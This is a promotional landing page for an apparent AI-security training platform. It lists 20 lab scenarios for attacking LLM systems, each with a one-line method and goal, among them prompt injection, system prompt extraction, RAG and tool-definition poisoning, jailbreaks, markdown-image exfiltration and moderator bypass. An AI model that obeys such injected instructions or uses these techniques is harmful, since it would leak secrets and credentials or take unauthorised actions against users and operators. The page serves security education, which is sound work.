KageXKageX
2 Labs Free — No Credit Card

Learn AI security by actually hacking AI

20 hands-on scenarios where you attack real AI systems in your browser. A structured course takes you from beginner to expert. No setup needed.

1

Pick a challenge

Choose from 20 scenarios across 4 difficulty levels.

2

Hack the AI

Get your own private environment. Use hints if you're stuck.

3

Earn your certificate

Complete all labs. Share your certificate on LinkedIn.

20 attack scenarios

Each scenario is a different way AI systems get attacked in the real world. Start with the basics and work your way up to expert-level challenges.

01LLM01
Prompt Injection to XSS

Unsanitized LLM output rendering enables cross-site scripting. Craft prompts that make the model produce executable JavaScript.

Beginnerphi3
02LLM07
System Prompt Extraction

Extract hidden system instructions from a multimodal model using prompt rewording and misdirection techniques.

Beginnerphi3
03LLM06
PII Leakage

Bypass instruction-only access controls to leak salary data and PII from a knowledge-base-augmented assistant.

Beginnerphi3
04LLM07
Insecure Plugin Design

Exploit a confused-deputy flaw in a smart home assistant. An outer LLM has constraints — the inner processing pipeline does not.

Intermediatephi3
05LLM02
SQLi via LLM

Trick a text-to-SQL assistant into generating UNION queries that expose a hidden table with credentials.

Intermediatemistral
06LLM03
RAG Poisoning

Upload malicious documents into a RAG pipeline and override legitimate HR policy by exploiting recency bias.

Intermediatemistral
07LLM01
Image Prompt Injection

Embed hidden instructions inside receipt images to hijack a vision-model expense scanner.

Intermediatellava
08LLM01
Audio Prompt Injection

Inject SYSTEM OVERRIDE commands into meeting audio. The LLM is told to ignore in-transcript directives — break that guardrail.

Advancedmistral
09LLM08
Agentic Email Exfiltration

Social engineer an email AI agent with tool-calling into forwarding confidential board decks and credentials to an external address.

Advancedmistral
10LLM02
LLM-Generated Code Execution

Trick a coding assistant into generating malicious Python that gets executed server-side through an unsandboxed exec() pipeline.

Advancedmistral
11LLM02
SSRF via LLM URL Generation

A research assistant fetches URLs the LLM generates. Trick it into requesting internal endpoints — cloud metadata, admin panels, localhost services.

Advancedmistral
12LLM01
Multi-Turn Jailbreak

The model has layered defenses: system prompt, input filters, and output guards. Erode all three across a multi-turn conversation to extract the secret.

Advancedphi3
13LLM01
Indirect Prompt Injection

A web research assistant fetches and summarizes pages. Plant injection payloads on a page that the LLM will read and blindly follow.

Advancedmistral
14LLM08
LLM Authorization Bypass

An LLM controls role-based access to an internal knowledge base. Escalate from viewer to admin through prompt manipulation — no code exploits needed.

Expertmistral
15LLM02
Markdown Image Exfiltration

LLM output is rendered as Markdown. Trick the model into generating an image tag whose URL contains exfiltrated secrets as query parameters.

Expertmistral
16LLM02
Structured Output Injection

An LLM generates JSON consumed by a pricing API. Inject values into the structured output to set product prices to zero or grant unauthorized discounts.

Expertmistral
17LLM07
Tool Definition Poisoning

An agent loads tool definitions dynamically. Inject a malicious tool description that redirects legitimate tool calls to an attacker-controlled handler.

Expertmistral
18LLM08
Multi-Agent Chain Attack

Two LLM agents communicate in a pipeline — a planner and an executor. Inject into the planner context to make the executor perform unauthorized actions.

Expertmistral
19LLM06
RAG Membership Inference

A RAG system over a private document corpus. Probe embedding similarity to determine whether specific confidential documents exist in the index without ever seeing them.

Expertmistral
20LLM01
LLM-as-a-Judge Bypass

An LLM moderator reviews user content before publishing. Craft adversarial text that passes moderation but contains policy-violating material invisible to the judge.

Expertmistral

Start with 2 free labs. No credit card.

Try it yourself — two labs and two course levels are completely free. Upgrade when you want the full experience.

Start Free